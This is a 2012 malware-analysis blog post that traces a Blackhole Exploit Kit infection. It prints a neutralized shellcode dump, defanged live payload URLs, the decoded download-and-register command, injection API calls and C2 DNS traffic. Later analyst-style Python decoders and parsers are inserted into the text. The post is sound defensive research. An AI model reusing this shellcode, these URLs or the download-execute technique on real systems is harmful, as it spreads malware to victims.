Sunday, September 16, 2012

Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)

Well, currently #MalwareMustDie is in hunting mode, so I joined the event. This is actually a report of the first case in hand, which is becoming an important matter in the investigation of BHEK.
I received a report of infection, and after looking at a squid log I found the source,
which is 203.91.113.6 and is "suspected" of serving Blackhole.
Why I quoted that word is because I am about 95% sure of it.

Just arrived home from a 6hr driving trip; after setting up FreeBSD in analysis mode
and setting up privoxy & tor, I am aiming at the IP I mentioned previously.
The URL reported in the squid log doesn't seem to exist anymore;
it looks like the parameter was changed. The logged URL was:
h00p://bode-sales.net/w.php?f=9e4b3&e=2
I tried combining the latest possible Blackhole parameters and finally managed to download the URL below (via tor only..):
--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489
=> `main.php@page=3c23940fb7350489'
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Resolving bode-sales.net... 203.91.113.6
Connecting to bode-sales.net|203.91.113.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 68,856 40.80K/s
21:26:32 (40.74 KB/s) - `main.php' saved [68856]

GET /main.php?page=3c23940fb7350489 HTTP/1.0
User-Agent: MalwareMustDieDieDieee/666.666.666
Accept: */*
Host: bode-sales.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Sep 2012 12:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14
....(blah)
The file itself is the obvious obfuscated BHEK landing page JS/code; for research purposes I neutralized it here:-->>[PASTEBIN]
After deobfuscating it I found the Blackhole plugin detection, which I also neutralized for research purposes here:-->>[PASTEBIN]
The first time I checked this landing page on VirusTotal the detection was ZERO; now:
MD5: 88ebe56bca027174ab28406ddbafa2e6
File size: 67.2 KB ( 68856 bytes )
File name: main.php
File type: HTML
Detection: 4 / 42
Analysis date: 2012-09-15 17:09:47 UTC ( 0 min ago )
URL: ---------->>[VIRUS-TOTAL]
Malware Name:
McAfee : JS/Exploit-Blacole.gq
Symantec : Trojan.Malscript
McAfee-GW-Edition : JS/Exploit-Blacole.gq
Kaspersky : Trojan-Downloader.JS.Expack.adl
As previously reported in this blog-->[HERE], the exploit vector of the plugin detect is basically unchanged, and in our case now we have 6 (six) exploitations.
(The details are exactly as per reported beforehand)
1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9]
2. PDF File AcroPDF.PDF
3. DOMDocs Msxml2.XMLHTTP
4. Java Exploit javaplugin.191_40
5. Java webStart exploit JavaWebStart.isInstalled
*) I thought this time it was without the SWF Exploit infector; a friend advised me and then I realized there is a
6. SWF Exploit (field.swf)-->[VT:20/42]
However, we have slight changes in the shellcode. I am a big fan of shellzer, a PyDbg-based shellcode decoder, and use it often in many of my projects. We had a problem figuring out this blog's shellcode using shellzer, so I cracked it manually; if some of you have the same problem, I am sharing this howto as a reference. The above infector exploits have the mission of executing the shellcode below:
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 e9 56fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 af 1c Ocad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b 5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 2O cO b4 d6 d7 d7a6 66 26 c4 bO d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44 4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d 1e 4b 1f 49 Oe 4d 15 19 28 28 *) PS: the above↑shellcode is neutralized
FYI, shellzer hangs if you paste this code. I am not going into the debugging details of WHY it hangs; let's focus on the point and solve the code. Let's dump all of the strings first; you'll get something like this:
iiiiN ..u4._3 d.@0.@ f.^< t3,.. u..4$..uQ..LQV.u<.t5x .V.v @..; u.^.^$ K.F. ....h .......XPj@h ...P. PU...^ .hon..hurlmT ...a .r.. ...\$ AQj.j.SWj. j... ?.u.G /p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((
We won't know what this is all about except for what looks like an obfuscated URL in the last line, so I scanned it to get the signatures & info below:
msf.fnstenv_mov: D9EED97424F45B817313
msf.jmp_call_additive: EB0C5E56311EAD01C3
msf.noupper: EB195E8BFE83C7008BD7
msf.shikata_ga_nai: DAD729C9B15AD97424F4
msf.single_static_bit: EB655E31ED83E10183E301
msf.countdown: FFC15E304C0E07E2FA
msf.call4_dw: FFC05E81760E
CCCCCC.xor: 434343434343EB0F5B33C966B9
77efe4.xor: 304500454975F9EB00
CCCC_INC_EBX_Slide: 43434343
XXXX_pop_eax_start: 58585858
7_push_PSQRVWU: 505351525657559CE8
push_user32: 68333200006855736572
push_urlmon: 686F6E00006875726C6D
push_shell32: 686C333200687368656C
edi_seh_k32: 33FF64FF37648927FF07EBE8
peb_k32: 64A1300000008B400C8B701C
hasher.ror7: 3AD67408C1CB0703DA40
E9Eb.hasher.rol3xor: C1C20332104080380075F5
didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC
From this I guessed that the API methods of urlmon.dll, among others, were used in the code, but couldn't detect any kernel32.dll API yet. Let's skip that for a while. Now it is time to brute-force (bf) the code; you can use any tools available and try some bf logic! :-) Shortly, I got these interesting strings and fixed them:
h00p://bode-sales.net/w.php?f=56c7a&e=1
$regsvr32 -s $hwpbt$i.dll
*) where $h further leads to the temp dir strings and $i leads to null values, so I put 0 in it.
The story is that urlmon.dll is called to download the malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1", save it as %Temp%wpbt0.dll, execute it, and register it with the "regsvr32 -s" command on your PC. It looks like we have a slight change in the shellcode API: the calls now come from a DLL other than kernel32.dll. This is the point of difference compared to the previous BHEK shellcode. So let's see what payload it is (using tor) and save it as the malware scheme wanted it:
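For the "bf logic" step above, here is an added Python example of my own (not the blog's tooling and not shellzer) showing the two ways an analyst gets at the key of a single-byte XOR shellcode like this one: reading it straight out of the decoder stub (the sub cx / xor byte [eax],KK / inc eax / loop pattern that opens the dump above, where the loop count is what the sub leaves in cx), or brute-forcing all 256 keys and scoring each result by the strings a download-and-register payload is expected to carry. The input is a constructed sample with a placeholder URL, not the neutralized shellcode from the post; the stub byte layout and the marker strings are my assumptions.

```python
import re
import struct

# Constructed sample (NOT the post's shellcode): a decoder stub of the same
# shape as the one at the top of the dump above, followed by a plaintext body
# XOR'ed with one key byte. The URL is a placeholder.
KEY = 0x28
BODY_PLAIN = (
    b"h00p://example.invalid/w.php?f=PLACEHOLDER&e=1\x00"
    b"regsvr32 -s \x00wpbt0.dll\x00urlmon\x00"
)
# 58             pop eax          ; eax -> start of encoded body
# 31 c9          xor ecx, ecx
# 66 81 e9 imm16 sub cx, imm16    ; cx wraps to 0x10000 - imm16 = body length
# 80 30 KK       xor byte [eax], KK
# 40             inc eax
# e2 fa          loop (back to the xor)
STUB = (
    b"\x58\x31\xc9\x66\x81\xe9"
    + struct.pack("<H", (0x10000 - len(BODY_PLAIN)) & 0xFFFF)
    + bytes([0x80, 0x30, KEY, 0x40, 0xE2, 0xFA])
)
SAMPLE = STUB + bytes(b ^ KEY for b in BODY_PLAIN)

# sub cx, imm16 ; xor byte [eax], key ; inc eax ; loop
DECODER_RE = re.compile(rb"\x66\x81\xe9(..)\x80\x30(.)\x40\xe2\xfa", re.DOTALL)


def key_from_stub(blob):
    """Read key and body length straight out of the decoder stub, if present.
    Returns (key, body_len, body_offset) or None."""
    m = DECODER_RE.search(blob)
    if m is None:
        return None
    imm16 = struct.unpack("<H", m.group(1))[0]
    body_len = (0x10000 - imm16) & 0xFFFF
    return m.group(2)[0], body_len, m.end()


def xor_decode(blob, key, start=0, length=None):
    end = len(blob) if length is None else start + length
    return bytes(b ^ key for b in blob[start:end])


def printable_strings(data, min_len=5):
    """Same idea as the 'dump all of the strings' step: runs of printable ASCII."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Substrings a download-and-register payload is expected to carry; assumption
# for scoring, based on what the post recovered.
MARKERS = (b"://", b".dll", b"regsvr32", b"%Temp%", b"urlmon")


def bruteforce_key(blob, markers=MARKERS):
    """Try every single-byte key and keep the one that exposes the most markers."""
    best_key, best_score = None, 0
    for key in range(256):
        score = sum(xor_decode(blob, key).count(m) for m in markers)
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def analyse(blob):
    """Prefer the stub's own key; fall back to brute force when no stub is found."""
    stub = key_from_stub(blob)
    if stub is not None:
        key, body_len, body_off = stub
        body = xor_decode(blob, key, body_off, body_len)
        method = "stub"
    else:
        key = bruteforce_key(blob)
        body = xor_decode(blob, key)
        method = "bruteforce"
    return {"method": method, "key": key, "strings": printable_strings(body)}


if __name__ == "__main__":
    result = analyse(SAMPLE)
    print("key 0x%02x via %s" % (result["key"], result["method"]))
    for s in result["strings"]:
        print("  ", s)
```

The stub path is the one to try first when you have the raw bytes: the key byte is right there in the xor instruction and the sub immediate tells you how long the body is, so nothing has to be emulated. The brute-force path is what you fall back to when the stub has been mangled (or, as with the neutralized dump above, deliberately altered), and its weakness is the marker list: a payload that names a different loader than regsvr32 would need its own markers.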
--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 143207 (140K) [application/x-msdownload]
Saving to: `wpbt0.dll'
100%[======>] 143,207 44.5K/s in 3.1s
2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]
It is a PE binary with the below analysis:
Hexing first sector:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP....
0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2....
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................

↑Quick reversing it... to seek some clue..
[0x00000000:0x00400000]> d
0x00000000 (01) 4d            DEC EBP
0x00000001 (01) 5a            POP EDX
0x00000002 (01) 90            NOP
0x00000003 (02) 0003          ADD [EBX], AL
0x00000005 (02) 0000          ADD [EAX], AL
0x00000007 (03) 000400        ADD [EAX+EAX], AL
0x0000000a (02) 0000          ADD [EAX], AL
0x0000000c (01) ff            DB 0xff
0x0000000d (02) ff00          INC DWORD [EAX]
0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH
0x00000015 (02) 0000          ADD [EAX], AL
0x00000017 (03) 0040 00       ADD [EAX+0x0], AL
:
:
----- tastes like a packer trace.. -----
0x00000034 (02) 0000          ADD [EAX], AL
0x00000036 (02) 0000          ADD [EAX], AL
0x00000038 (02) 0000          ADD [EAX], AL
0x0000003a (02) 0000          ADD [EAX], AL
0x0000003c (03) 8000 00       ADD BYTE [EAX], 0x0
0x0000003f (02) 000e          ADD [ESI], CL
0x00000041 (01) 1f            POP DS
0x00000042 (05) ba 0e00b409   MOV EDX, 0x9b4000e
0x00000047 (02) cd 21         INT 0x21
0x00000049 (05) b8 014ccd21   MOV EAX, 0x21cd4c01
0x0000004e (01) 54            PUSH ESP
0x0000004f (05) 68 69732070   PUSH 0x70207369
0x00000054 (02) 72 6f         JB 0x000000c5 ; 1
:
:
PE Summary
Entry Point: 0x1000 at section: .code
CRC Fail: Claimed: 0 Actual: 185076
Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW!
Packer: PureBasic 4.x -> Neil Hodgson
Compiler: Microsoft Visual C++ 5/6
Sections (name, VA, virtual size, raw size):
.code  0x1000  0x2775 10240
.teXT  0x4000  0xc335 50176
.rdata 0x11000 0x1a0f 7168
.data  0x13000 0x1218 2560
.rsrc  0x15000 0x115c 4608

Auto reverse first block and ...got the loops :-P
[0x401000L] push 0x0
[0x401005L] push 0x413998
[0x40100aL] call 0x404070L
[0x40100fL] add esp 0xc
[0x401014L] push 0x0
:
loop
:
[0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it!
[0x40167aL] fstp st0
[0x40167fL] fild [0x413a08]
[0x401681L] fmul [0x413040]
[0x401687L] sub esp 0x4
[0x40168dL] fstp [esp]

Calls: Complete calls listed here:--->>[PASTEBIN]
With the calls summary as per below:
Get system env, opening/exec files (by original C code), opening thread, using timer, bitmap object manipulation, GUI operations, using winsock, creation of TLS, creation of semaphores
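The "PE Summary" fields above can be read straight from the first-sector hex the post shows. As an added example (my own script, not the author's tool), the Python below transcribes that dump and walks MZ -> e_lfanew -> PE signature -> COFF header -> start of the optional header, then applies the two checks the author is implicitly making: how fresh the compile stamp is relative to first sighting, and whether the file is really a DLL. Only the bytes printed on the page are used, so the section table and the checksum (both past 0xCF) are out of reach; the field offsets are the standard PE32 layout, and the first-seen time is the VirusTotal analysis date quoted later in the post.

```python
import struct
from datetime import datetime, timezone

# First 0xD0 bytes of wpbt0.dll, transcribed from the post's "Hexing first
# sector" dump. Nothing beyond 0xCF is on the page, so that is all we parse.
FIRST_SECTOR_HEX = """
4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00
B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00
50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00
00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00
00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00
00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
"""
FIRST_SECTOR = bytes.fromhex(FIRST_SECTOR_HEX)

# VirusTotal analysis date quoted in the post for this sample.
VT_FIRST_SEEN = datetime(2012, 9, 15, 16, 21, 4, tzinfo=timezone.utc)

IMAGE_FILE_DLL = 0x2000
IMAGE_FILE_MACHINE_I386 = 0x14C


def parse_pe_header(data):
    """Walk MZ -> e_lfanew -> PE\\0\\0 -> COFF header -> start of optional header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]   # PE32 offset
    compiled = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    return {
        "machine": machine,
        "sections": nsections,
        "timestamp": timestamp,
        "compile_time": compiled.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "optional_header_size": opt_size,
        "characteristics": characteristics,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "pe32plus": magic == 0x20B,
        "entry_point": entry_rva,
        "image_base": image_base,
    }


def triage_notes(info, first_seen):
    """Analyst-style checks: fresh compile stamp, name/type mismatch."""
    notes = []
    compiled = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    age = first_seen - compiled
    if 0 <= age.total_seconds() < 7 * 86400:
        notes.append("compiled %d day(s) before first seen" % age.days)
    if not info["is_dll"]:
        notes.append("IMAGE_FILE_DLL not set: an EXE despite the .dll name")
    return notes


def triage_wpbt0():
    return triage_notes(parse_pe_header(FIRST_SECTOR), VT_FIRST_SEEN)


if __name__ == "__main__":
    info = parse_pe_header(FIRST_SECTOR)
    for k, v in info.items():
        print("%-21s %s" % (k, hex(v) if isinstance(v, int) and not isinstance(v, bool) else v))
    for note in triage_wpbt0():
        print("note:", note)
```

The compile stamp comes out as 2012-09-14 12:00:32 UTC, one day before the post's VirusTotal first sighting, which is the "NEW!" the author flags. The Characteristics word (0x010F) has no IMAGE_FILE_DLL bit, which agrees with VirusTotal calling the file "Win32 EXE" even though the shellcode saves it as wpbt0.dll; a header/extension mismatch like that is cheap to check at scale and worth keeping in a triage script.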
↑OK, it looks strange enough; let's reverse it well. I used radare2. You can use anything you like; if you reverse it correctly you'll find the malicious API calls below inside the packed parts of the sample (tip: unpack it first):
CopyFileW (lpExistingFileName: "%Temp%wpbt0.dll", lpNewFileName: "%ApData%\KB00725031.exe", bFailIfExists: 0x0)
CreateRemoteThread (hProcess: 0x68, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x12032f0, lpParameter: 0x1200000, dwCreationFlags: 0x0, lpThreadId: 0x0)
So we have a self-copy operation and foreign memory injection here. Let's use a sandbox to quickly confirm it:
Malicious Processes
1960 c:\test\sample.exe (wpbt0.dll)
328 c:\documents and settings\user\application data\kb00725031.exe
Yes, it dropped the malware kb00725031.exe, and somehow I remembered this filename from a while ago. I searched & found it here--->>[LINK] (the details of this drop will be another story with a long history). Let's continue; VirusTotal showed this detection when I found the payload the first time:
AntiVir : TR/Buzus.HT.11
AhnLab-V3 : Trojan/Win32.Jorik
Sophos : Mal/EncPk-AFN
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Kaspersky : Trojan.Win32.Jorik.Foreign.aa
Microsoft : VirTool:Win32/CeeInject.gen!HT
Comodo : UnclassifiedMalware
Now it is:
MD5: a70da3ce151ac0eb46e3a0d959cd0af3
File size: 139.9 KB ( 143207 bytes )
File name: wpbt0.dll
File type: Win32 EXE
Detection : 9 / 41
Analysis date: 2012-09-15 16:21:04 UTC ( 0 min ago )
URL:-------->>>[CLICK/VIRUS-TOTAL]
Malware Name:
VIPRE : Trojan.Win32.Generic!BT (NEW)
AntiVir : TR/Buzus.HT.11 (NEW)
AhnLab-V3 : Trojan/Win32.Jorik
ESET-NOD32 : a variant of Win32/Injector.WNM (NEW)
Sophos : Mal/EncPk-AFN
Microsoft : VirTool:Win32/CeeInject.gen!HT
Symantec : Trojan.ADH.2 (NEW)
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Comodo : UnclassifiedMalware
Well, it is supposed to connect to the internet, so let's carefully run it a bit :-) It works as expected and starts communicating with the mothership at 146.185.220.34! Below is my record of the UDP traffic:
Req:
00000000  00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e  ........ .....tun
00000010  69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72  inglambo sglamour
00000020  02 72 75 00 00 01 00 01                          .ru.....
Ans:
00000000  00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e  ........ .....tun
00000010  69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72  inglambo sglamour
00000020  02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00  .ru..... ........
00000030  0e 0f 00 04 92 b9 dc 22                          ......."
Yes, it asked for
tuninglambosglamour.ru IN A // 146.185.220.34
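The UDP exchange above is a plain DNS query and its answer, and the "IN A // 146.185.220.34" line can be recovered from the bytes mechanically. As an added example (my own code, not from the post), the Python below transcribes the "Ans:" dump from the page, parses the header, question and answer sections including the c0 0c compression pointer, and then matches the resolved address against a watchlist seeded with the mothership IP the post names. The watchlist usage is my illustration of how such a capture would be turned into a detection; the packet bytes are exactly the ones on the page.

```python
import struct

# The dropper's DNS answer, transcribed from the post's "Ans:" UDP dump.
DNS_ANSWER = bytes.fromhex(
    "00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e "
    "69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 "
    "02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 "
    "0e 0f 00 04 92 b9 dc 22"
)

# Mothership IP named in the post; used here as a one-entry watchlist.
WATCHLIST = {"146.185.220.34"}


def read_name(msg, off):
    """Decode a DNS name at off, following RFC 1035 compression pointers.
    Returns (dotted name, offset just past the name as it appears at off)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # 2-byte pointer: 11xxxxxx xxxxxxxx
            if end is None:
                end = off + 2                     # the pointer is where the name ends
            off = struct.unpack_from(">H", msg, off)[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_dns_response(msg):
    """Parse header, question and answer sections of a DNS message."""
    txid, flags, qdcount, ancount, _ns, _ar = struct.unpack_from(">6H", msg, 0)
    off = 12
    questions, answers = [], []
    for _ in range(qdcount):
        name, off = read_name(msg, off)
        qtype, qclass = struct.unpack_from(">HH", msg, off)
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(ancount):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:             # A record: render as dotted quad
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {
        "id": txid,
        "is_response": bool(flags & 0x8000),
        "rcode": flags & 0xF,
        "questions": questions,
        "answers": answers,
    }


def watchlist_hits(parsed, watchlist=WATCHLIST):
    """Return (qname, ip) pairs whose resolved address is on the watchlist."""
    return [(name, ip) for name, rtype, _ttl, ip in parsed["answers"]
            if rtype == 1 and ip in watchlist]


if __name__ == "__main__":
    parsed = parse_dns_response(DNS_ANSWER)
    for name, rtype, ttl, rdata in parsed["answers"]:
        print("%s IN A %s (ttl %d)" % (name, rdata, ttl))
    print("watchlist hits:", watchlist_hits(parsed))
```

The TTL in the answer is 0x0e0f, i.e. 3599 seconds, so a resolver cache would keep this mapping for about an hour; when pivoting from a known mothership IP to the domains that point at it, that is the window within which a passive-DNS sensor should have seen the same answer.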
I bet it does some more malicious stuff, as per the referenced analysis above. By the way, the network info of the mothership:
inetnum:        146.185.220.0 - 146.185.220.255
netname:        mdsru-net
descr:          MDS LTD.
country:        RU
org:            ORG-Ml192-RIPE
admin-c:        AV6782-RIPE
tech-c:         VA2854-RIPE
status:         ASSIGNED PA
mnt-by:         mdsru-mnt
source:         RIPE # Filtered

organisation:   ORG-Ml192-RIPE
org-name:       MDS ltd.
org-type:       OTHER
abuse-mailbox:  info@mdsnet.org
address:        Sofia Kovalevsaja st. 22
address:        620242 Ekaterinburg
address:        Russian Federation
mnt-ref:        mdsru-mnt
admin-c:        AV6782-RIPE
mnt-by:         mdsru-mnt
source:         RIPE # Filtered

person:         Andrey Voronov
address:        1st Magistralny blind alley
address:        24, BC "The Yard"
address:        Moskow
abuse-mailbox:  info@mdsnet.org
address:        Russian Federation
phone:          +74957392422
nic-hdl:        AV6782-RIPE
mnt-by:         mdsru-mnt
source:         RIPE # Filtered

person:         Vlad Abramov
address:        1st Magistralny blind alley
address:        24, BC "The Yard"
address:        Moskow
abuse-mailbox:  info@mdsnet.org
address:        Russia
phone:          +74957392422
nic-hdl:        VA2854-RIPE
mnt-by:         mdsru-mnt
source:         RIPE # Filtered
While the landing page is in this network:
inetnum:        203.91.112.0 - 203.91.119.255
netname:        G-Mobile
descr:          G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1,
descr:          Ulaanbaatar 211213, Mongolia
country:        MN
admin-c:        TG154-AP
tech-c:         TG154-AP

route:          203.91.113.0/24
descr:          G-Mobile Subnet
origin:         AS24559
mnt-by:         MAINT-MN-WIRELESSCOM
changed:        tulga@g-mobile.mn 20090205
source:         APNIC

person:         Tulga Gandavaa
nic-hdl:        TG154-AP
e-mail:         tulga@g-mobile.mn
address:        G-Mobile Corporation,
address:        Chingeltei district 1st khoroo, Baga toiruu - 3/9
address:        Ulaanbaatar, Mongolia
phone:          +976-98101111
fax-no:         +976-11-311195
country:        MN
changed:        tulga@g-mobile.mn 20070111
mnt-by:         MAINT-MN-G-MOBILE

↑There are four more domains hosted on the same IP, so there will be variation in the possible spam links to this infector.
This case's malware family photograph:

Conclusion: The moral of this story is that the shellcode format of BHEK is starting to change. The usual kernel32.dll API based calls are becoming undetected, yet it still downloaded the dropper binary, which now contains the copy API. It is a slight modification, but it successfully fools some automation schemes. Further investigation made me realize the reason, which is written up in "Bypassing Export address table Address Filter (EAF)", which can be viewed--->>[HERE], and additionally a friend advised me of the crash PoC of it here-->>[HERE]. Maybe shellzer must be patched to handle this new type of shellcode.

I must say, maybe I missed something, since most of the reversing was done manually, so please forgive me for that and please advise me in the comment area. I think some other changes in BHEK distribution are on the run too. Let's keep our eyes stuck to it and see what happens. BTW, the infected URLs are all up and alive, so please be careful with them. Malware MUST Die!!